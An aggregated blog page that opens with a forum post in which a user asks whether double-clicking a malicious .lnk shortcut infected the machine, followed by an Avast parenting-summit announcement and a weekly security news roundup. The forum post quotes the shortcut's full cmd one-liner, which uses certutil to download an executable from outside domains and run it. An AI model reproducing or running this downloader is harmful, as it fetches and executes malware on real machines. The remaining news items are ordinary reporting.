Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Avast Speaks at Virtual Digital Sanity Summit | Avast - Security Boulevard

Avast Speaks at Virtual Digital Sanity Summit | Avast - Security Boulevard


Avast Speaks at Virtual Digital Sanity Summit | Avast - Security Boulevard

Posted: 27 Mar 2020 05:29 PM PDT

We are now rounding out the second week of California's shelter-in-place order, and I'm sure I'm not the only parent who will admit to abandoning my kids' screen time rules as part of this "new normal." When I have to jump on a Zoom, I can open one of our favorite e-Learning apps to occupy my youngest, or when everyone's maxed out, we can stream a movie to provide some escape. Never before have I been so grateful for technology and the benefits of connectivity.

Of course, all of this newfound freedom on the web is rightfully raising some eyebrows for parents. How many hours in front of the Xbox is too many? How do I regulate the type of videos my children see on YouTube? And what even is TikTok, anyway?

This is where Avast steps in. I'm excited to announce that we have joined forces with ImpactPARENTS to bring you expert advice and resources on digital parenting amid a pandemic. Mark your calendars for Monday, March 30 – Friday, April 3 and join us online for the first-ever Digital Sanity Summit, a free, virtual event open to all. 

My colleague Leena Elias will kick off the event with a talk about best practices for keeping children safe online, their information private, and their content age-appropriate. She's a mother of three teenagers as well as one of the driving forces behind our award-winning home network security solution, Omni, so you don't want to miss this discussion. To hear Leena's digital wellness playbook for parents, tune in at 10 a.m. EST / 4 p.m. CEST on Monday, March 30.

The rest of the agenda is equally as impressive, featuring nearly 20 interviews and live coaching with world-renowned researchers, psychiatrists, and parenting experts. We'll be summarizing some of their most important takeaways right here on the Avast blog, so be sure to check back next week for our recap posts. 

Register now to save your seat for the 2020 Digital Sanity Summit!

*** This is a Security Bloggers Network syndicated blog from Blog | Avast EN authored by Avast Blog. Read the original post at: https://blog.avast.com/avast-speaks-at-virtual-digital-sanity-summit

Hackers Leak FSB Plan for IoT Botnet | Avast - Security Boulevard

Posted: 27 Mar 2020 06:59 AM PDT

This week, Russian hacking group Digital Revolution leaked documents it claims to have pilfered from a company building a cyberweapon for the FSB, the Russian intelligence agency. ZDNet reporters who have seen the leaked data said the documents charge Russian company InformInvestGroup CJSC with accepting an order from the FSB to create an IoT botnet inspired by the notorious Mirai botnet of 2016. Timestamps show the project, called "Fronton," began in 2017. The documents themselves come from ODT (Oday) LLC, the subcontractor hired by InformInvestGroup CJSC to develop the malware. This type of governmental outsourcing is common, according to Avast security evangelist Luis Corrons. "While most countries in the world focus mainly on defense, a few others like the US, Russia, China, and North Korea, have powerful offensive capacities. This leak just confirms what we already knew – intelligence agencies outsource to develop the malware they use."

The plans for the botnet show that its main targets would be security cameras and network video recorders (NVRs), devices that use robust communication channels. The botnet is designed to form 95% of itself strictly out of those two types of devices. According to the plans, each infected device in the botnet would get reprogrammed to carry out password attacks on other devices in order to keep the botnet alive and growing. With a large enough botnet, attackers can launch DDoS attacks that can jam up any online entity's internet traffic. To hide the malware's origin, the Fronton specs forbid the use of the Russian language and the Cyrillic alphabet in any of the source code or project documents. Digital Revolution has hacked subcontractors of the FSB in the past, leaking details of state-backed hacking plans such as social media monitoring, email monitoring, and a way to de-anonymize Tor users.

Early 2020 spike in Chinese nation-state hacking

Cybersecurity researchers have noted a sharp increase in cyberespionage campaigns by Chinese state-backed group APT41. Cyberscoop reported that between January 20 and March 11 this year, the infiltration campaign targeted 75 organizations, spanning a broad spectrum of industries including the banking sector, higher education, manufacturing, and technology. The end goal of the attacks is unclear, with researchers unsure whether or not any data was stolen in the operation. One expert told Cyberscoop the increased activity could be due to any number of reasons, such as the U.S.-China trade war, the COVID-19 pandemic, or simply reconnaissance for the future. The campaign focused on the exploitation of vulnerabilities in Cisco routers and specific software made by Citrix and Zoho.

This week's quote

"The irony here is that disclosures that lead to fixes that we don't implement leave us at more risk than ever." 

– Avast guest blogger Kevin Towsend on the difficulties of vulnerability disclosure for both companies and users and what that means for the security of our devices. 

GE data breach affects current and former employee's

U.S. energy conglomerate General Electric disclosed that between February 3 and February 14, an authorized party gained access to an employee's email account at Canon Business Process Services, one of GE's service providers. The account contained sensitive information about GE employees past and present, as well as their beneficiaries. Documents such as direct deposit forms, driver's licenses, birth certificates, and passports were among the exposed data. Neither GE nor Canon have announced how the data breach occurred, but one security expert told SC Magazine that the details released by GE seem to indicate it was a standard credential phishing attack or possibly a credential reuse from another site. 

More ransomware attackers start stolen-data websites

The trend continues as three more ransomware attackers have launched websites for the public posting of their victims' data. Bleeping Computer reported that Nefilm Ransomware, CLOP Ransomware, and a new strain called Sekhmet have put up sites, each of which has at least one victim's data posted. The three join other ransomware attackers like Maze and DoppelPaymer in adding extra pressure on their victims by threatening to make sensitive files public if the ransom is unpaid. This trend merges ransomware attacks with data breaches, creating a new compounded threat. 

This week's stat

Almost 1 million – that's the number of times malicious Android Apps with Tekya malware have been downloaded. 

New malware found in 56 Google Play apps

A new strain of malware dubbed "Tekya" has been discovered in 56 Google Play apps, roughly half of them children's games such as puzzles and racing. The malware commits ad fraud by mimicking user actions to click advertisements, which makes money for the attacker. Aside from children's games, the other infected apps were Android utility apps such as calculators, translators, and cooking apps. In total, the apps have been downloaded almost a million times. Upon learning of Tekya, Google Play removed all 56 apps from their shop. More info on this at Dark Reading

Hacked Tupperware website steals customer payment info

Security researchers spotted a malicious image file on the Tupperware website's checkout page. Clicking on the image brought up a phony payment form that collected the user's payment information. Upon submitting the form, the user got a bogus error message that time had expired and the page needed to refresh. Then, the user was taken to the legitimate Tupperware payment form. Researchers discovered the payment skimming scam on March 20 and reported their findings to Tupperware, but the company did not respond and has still not issued a statement acknowledging the hack. As of March 25, however, the malicious image file had disappeared from the website's checkout page. More on this story at Silicon Angle

This week's 'must-read' on The Avast Blog

If you're looking to technology for help with your baby or your elderly parents, we've got you covered. Read these tips on how to pick the right baby monitor and these tips for how to use technology to improve your elderly parents' lives. 


Avast is a global leader in cybersecurity, protecting hundreds of millions of users around the world. Protect all your devices with our award-winning free antivirus. Safeguard your privacy and encrypt your online connection with SecureLine VPN. Get advertisers off your back and disguise your online identity for greater privacy with Avast AntiTrack.

*** This is a Security Bloggers Network syndicated blog from Blog | Avast EN authored by Avast Blog. Read the original post at: https://blog.avast.com/hackers-leak-fsb-plan-for-iot-botnet-avast

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US